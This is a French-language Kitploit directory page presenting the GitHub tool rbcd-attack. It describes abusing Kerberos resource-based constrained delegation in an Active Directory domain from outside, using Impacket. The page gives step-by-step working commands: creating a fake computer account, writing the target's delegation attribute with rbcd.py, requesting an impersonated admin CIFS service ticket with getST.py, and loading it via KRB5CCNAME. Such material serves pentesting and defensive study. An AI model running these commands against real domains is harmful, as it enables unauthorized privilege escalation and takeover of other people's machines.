Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/tothi/rbcd-attack
Escalade de PrivilègesExploitationTests d'Intrusion
GitHubtothi/rbcd-attack

rbcd-attack

Attaque par délégation contrainte basée sur les ressources Kerberos depuis l'extérieur utilisant Impacket

Voir le dépôt
64672il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Abus de la délégation contrainte basée sur les ressources Kerberos

TL;DR

Ce dépôt concerne une attaque pratique contre la délégation contrainte basée sur les ressources Kerberos dans un domaine Active Directory Windows.

La différence par rapport aux autres implémentations courantes est que nous lançons l'attaque depuis l'extérieur du domaine Windows, et non depuis un ordinateur joint au domaine (généralement Windows).

L'attaque est implémentée en utilisant uniquement Python3 Impacket (et ses dépendances). Testé sur Arch avec Impacket à jour (0.9.21 au moment de la rédaction).

Journal d'attaque

L'attaque

En résumé, sans entrer dans les détails, l'attaque cible un ordinateur du domaine, plus précisément les principaux de service liés à l'ordinateur cible.

Ce dont nous avons besoin comme prérequis :

  • un compte de domaine avec un accès en écriture à l'ordinateur cible (exactement un accès en écriture à la propriété msDS-AllowedToActOnBehalfOfOtherIdentity de l'objet ordinateur cible du domaine)
  • la permission de créer de nouveaux comptes ordinateur (c'est généralement par défaut, voir MachineAccountQuota)
  • un accès LDAP (389/tcp) et SAMR (445/tcp) (ou LDAPS (636/tcp)) au contrôleur de domaine.
  • un accès Kerberos (88/tcp) au contrôleur de domaine

Le chemin de l'attaque à très haut niveau :

  1. Créer un faux ordinateur
  2. Abuser de la propriété msDS-AllowedToActOnBehalfOfOtherIdentity de la cible
  3. Demander des tickets de service usurpés (S4U) pour l'ordinateur cible

Avantage :

  • Les tickets de service usurpés peuvent permettre un accès de haut niveau aux services sur la cible comme CIFS, HTTP, etc., si le compte usurpé a des privilèges. Parfois, la prise de contrôle de l'ordinateur.

Outils courants

Les ensembles d'outils courants pour cette attaque fonctionnent sur un ordinateur Windows joint au domaine en utilisant :

  • Powermad pour ajouter de nouveaux comptes ordinateur
  • Powerview de la branche dev de PowerSploit pour abuser de msDS-AllowedToActOnBehalfOfOtherIdentity
  • Rubeus pour les opérations de tickets S4U

Implémentation avec Impacket

Cette implémentation utilise purement Impacket depuis l'extérieur du domaine.

Création du faux ordinateur

En utilisant l'exemple addcomputer.py d'Impacket, créons un faux ordinateur (appelé evilcomputer) :

root@kitploit:~
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

Modification des droits de délégation

Implémenté le script rbcd.py trouvé ici dans le dépôt, qui ajoute le descripteur de sécurité lié au nouvel EVILCOMPUTER à la propriété msDS-AllowedToActOnBehalfOfOtherIdentity de l'ordinateur cible.

root@kitploit:~
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

Le script utilise massivement les classes Python de l'exemple ntlmrelayx.py d'Impacket. Pour obtenir de l'aide et un exemple, appelez le script sans options.

Obtention du ticket de service usurpé

Maintenant, tout est prêt pour abuser de la délégation contrainte via une requête S4U2Self et obtenir un ticket de service usurpé pour l'ordinateur cible. Avec le script exemple getST.py d'Impacket :

root@kitploit:~
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

La commande ci-dessus récupère un ticket de service CIFS au nom de l'utilisateur du domaine ciblé admin et le stocke dans le fichier admin.ccache.

Après avoir ajouté le chemin du fichier à la variable KRB5CCNAME, le ticket est utilisable pour les clients Kerberos.

root@kitploit:~
export KRB5CCNAME=`pwd`/admin.ccache
klist

Références

Pour plus de détails sur l'abus de la délégation contrainte basée sur les ressources :

  • https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  • https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
  • http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

Et l'une des présentations les plus complètes sur les attaques Kerberos :

  • Diapositives Constructing Kerberos Attacks with Delegation Primitives à Defcon par Elad Shamir et Matt Bush
Télécharger l’outil